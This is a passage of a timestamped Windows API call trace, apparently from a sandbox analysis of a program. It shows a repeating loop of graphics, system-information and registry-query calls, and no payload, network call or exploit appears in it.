CreateSolidBrush (color=0xff0000) returned 0x31057cd [0090.118] DeleteObject (ho=0x31057cd) returned 1 [0090.118] DeleteObject (ho=0xb0401d9) returned 1 [0090.118] DeleteObject (ho=0x90401dc) returned 1 [0090.118] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.118] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.118] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.119] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.119] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.119] BeginPath (hdc=0x0) returned 0 [0090.119] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.119] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.119] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.119] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.119] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.119] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.119] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.119] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.119] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401d9 [0090.119] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401dc [0090.119] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x20457d0 [0090.119] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457d1 [0090.119] CombineRgn (hrgnDst=0x20457d0, hrgnSrc1=0xc0401d9, hrgnSrc2=0xa0401dc, iMode=1) returned 1 [0090.119] CombineRgn (hrgnDst=0x10457d1, hrgnSrc1=0xc0401d9, hrgnSrc2=0xa0401dc, iMode=4) returned 2 [0090.119] CreateSolidBrush (color=0xff) returned 0x41057cd [0090.119] CreateSolidBrush (color=0xff0000) returned 0x11057d2 [0090.119] DeleteObject (ho=0x11057d2) returned 1 [0090.119] DeleteObject (ho=0xa0401dc) returned 1 [0090.119] DeleteObject (ho=0xc0401d9) returned 1 [0090.119] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.119] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.119] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.119] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.119] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.119] BeginPath (hdc=0x0) returned 0 [0090.119] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.119] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.119] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.119] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.119] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.119] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.120] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.120] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.120] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401dc [0090.120] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401d9 [0090.120] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457d3 [0090.120] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457d4 [0090.120] CombineRgn (hrgnDst=0x10457d3, hrgnSrc1=0xb0401dc, hrgnSrc2=0xd0401d9, iMode=1) returned 1 [0090.120] CombineRgn (hrgnDst=0x10457d4, hrgnSrc1=0xb0401dc, hrgnSrc2=0xd0401d9, iMode=4) returned 2 [0090.120] CreateSolidBrush (color=0xff) returned 0x21057d2 [0090.120] CreateSolidBrush (color=0xff0000) returned 0x11057d5 [0090.120] DeleteObject (ho=0x11057d5) returned 1 [0090.120] DeleteObject (ho=0xd0401d9) returned 1 [0090.120] DeleteObject (ho=0xb0401dc) returned 1 [0090.120] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.120] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.120] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.120] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.120] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.120] BeginPath (hdc=0x0) returned 0 [0090.120] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.120] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.120] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.120] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.120] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.120] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.120] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.120] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.120] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401d9 [0090.120] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401dc [0090.120] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457d6 [0090.121] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457d7 [0090.121] CombineRgn (hrgnDst=0x10457d6, hrgnSrc1=0xe0401d9, hrgnSrc2=0xc0401dc, iMode=1) returned 1 [0090.121] CombineRgn (hrgnDst=0x10457d7, hrgnSrc1=0xe0401d9, hrgnSrc2=0xc0401dc, iMode=4) returned 2 [0090.121] CreateSolidBrush (color=0xff) returned 0x21057d5 [0090.121] CreateSolidBrush (color=0xff0000) returned 0x11057d8 [0090.121] DeleteObject (ho=0x11057d8) returned 1 [0090.121] DeleteObject (ho=0xc0401dc) returned 1 [0090.121] DeleteObject (ho=0xe0401d9) returned 1 [0090.121] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.121] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.121] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.121] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.121] BeginPath (hdc=0x0) returned 0 [0090.121] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.121] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.121] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.121] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.121] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.121] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.121] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401dc [0090.121] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf0401d9 [0090.121] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457d9 [0090.121] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457da [0090.121] CombineRgn (hrgnDst=0x10457d9, hrgnSrc1=0xd0401dc, hrgnSrc2=0xf0401d9, iMode=1) returned 1 [0090.121] CombineRgn (hrgnDst=0x10457da, hrgnSrc1=0xd0401dc, hrgnSrc2=0xf0401d9, iMode=4) returned 2 [0090.121] CreateSolidBrush (color=0xff) returned 0x21057d8 [0090.121] CreateSolidBrush (color=0xff0000) returned 0x11057db [0090.121] DeleteObject (ho=0x11057db) returned 1 [0090.121] DeleteObject (ho=0xf0401d9) returned 1 [0090.121] DeleteObject (ho=0xd0401dc) returned 1 [0090.121] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.121] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.122] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.122] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.122] BeginPath (hdc=0x0) returned 0 [0090.122] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.122] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.122] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.122] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.122] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.122] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.122] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401d9 [0090.122] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401dc [0090.122] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457dc [0090.122] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457dd [0090.122] CombineRgn (hrgnDst=0x10457dc, hrgnSrc1=0x100401d9, hrgnSrc2=0xe0401dc, iMode=1) returned 1 [0090.122] CombineRgn (hrgnDst=0x10457dd, hrgnSrc1=0x100401d9, hrgnSrc2=0xe0401dc, iMode=4) returned 2 [0090.122] CreateSolidBrush (color=0xff) returned 0x21057db [0090.122] CreateSolidBrush (color=0xff0000) returned 0x11057de [0090.122] DeleteObject (ho=0x11057de) returned 1 [0090.122] DeleteObject (ho=0xe0401dc) returned 1 [0090.122] DeleteObject (ho=0x100401d9) returned 1 [0090.122] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.122] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.122] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.122] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.122] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.122] BeginPath (hdc=0x0) returned 0 [0090.122] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.122] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.122] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.122] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.122] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.122] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.123] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401dc [0090.123] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401d9 [0090.123] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457df [0090.123] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e0 [0090.123] CombineRgn (hrgnDst=0x10457df, hrgnSrc1=0xf0401dc, hrgnSrc2=0x110401d9, iMode=1) returned 1 [0090.123] CombineRgn (hrgnDst=0x10457e0, hrgnSrc1=0xf0401dc, hrgnSrc2=0x110401d9, iMode=4) returned 2 [0090.123] CreateSolidBrush (color=0xff) returned 0x21057de [0090.123] CreateSolidBrush (color=0xff0000) returned 0x11057e1 [0090.123] DeleteObject (ho=0x11057e1) returned 1 [0090.123] DeleteObject (ho=0x110401d9) returned 1 [0090.123] DeleteObject (ho=0xf0401dc) returned 1 [0090.123] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.123] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.123] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.123] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.123] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.123] BeginPath (hdc=0x0) returned 0 [0090.123] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.123] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.123] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.123] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.123] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.123] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.123] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.123] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.123] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401d9 [0090.123] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401dc [0090.123] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e2 [0090.123] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e3 [0090.123] CombineRgn (hrgnDst=0x10457e2, hrgnSrc1=0x120401d9, hrgnSrc2=0x100401dc, iMode=1) returned 1 [0090.123] CombineRgn (hrgnDst=0x10457e3, hrgnSrc1=0x120401d9, hrgnSrc2=0x100401dc, iMode=4) returned 2 [0090.123] CreateSolidBrush (color=0xff) returned 0x21057e1 [0090.123] CreateSolidBrush (color=0xff0000) returned 0x11057e4 [0090.123] DeleteObject (ho=0x11057e4) returned 1 [0090.123] DeleteObject (ho=0x100401dc) returned 1 [0090.124] DeleteObject (ho=0x120401d9) returned 1 [0090.124] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.124] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.124] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.124] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.124] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.124] BeginPath (hdc=0x0) returned 0 [0090.124] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.124] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.124] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.124] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.124] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.124] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.124] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401dc [0090.124] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401d9 [0090.124] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e5 [0090.124] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e6 [0090.124] CombineRgn (hrgnDst=0x10457e5, hrgnSrc1=0x110401dc, hrgnSrc2=0x130401d9, iMode=1) returned 1 [0090.124] CombineRgn (hrgnDst=0x10457e6, hrgnSrc1=0x110401dc, hrgnSrc2=0x130401d9, iMode=4) returned 2 [0090.124] CreateSolidBrush (color=0xff) returned 0x21057e4 [0090.124] CreateSolidBrush (color=0xff0000) returned 0x11057e7 [0090.124] DeleteObject (ho=0x11057e7) returned 1 [0090.124] DeleteObject (ho=0x130401d9) returned 1 [0090.124] DeleteObject (ho=0x110401dc) returned 1 [0090.124] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.124] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.124] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.124] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.124] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.124] BeginPath (hdc=0x0) returned 0 [0090.124] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.124] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.124] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.124] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.125] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.125] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401d9 [0090.125] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401dc [0090.125] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e8 [0090.125] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457e9 [0090.125] CombineRgn (hrgnDst=0x10457e8, hrgnSrc1=0x140401d9, hrgnSrc2=0x120401dc, iMode=1) returned 1 [0090.125] CombineRgn (hrgnDst=0x10457e9, hrgnSrc1=0x140401d9, hrgnSrc2=0x120401dc, iMode=4) returned 2 [0090.125] CreateSolidBrush (color=0xff) returned 0x21057e7 [0090.125] CreateSolidBrush (color=0xff0000) returned 0x11057ea [0090.125] DeleteObject (ho=0x11057ea) returned 1 [0090.125] DeleteObject (ho=0x120401dc) returned 1 [0090.125] DeleteObject (ho=0x140401d9) returned 1 [0090.125] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.125] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.125] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: 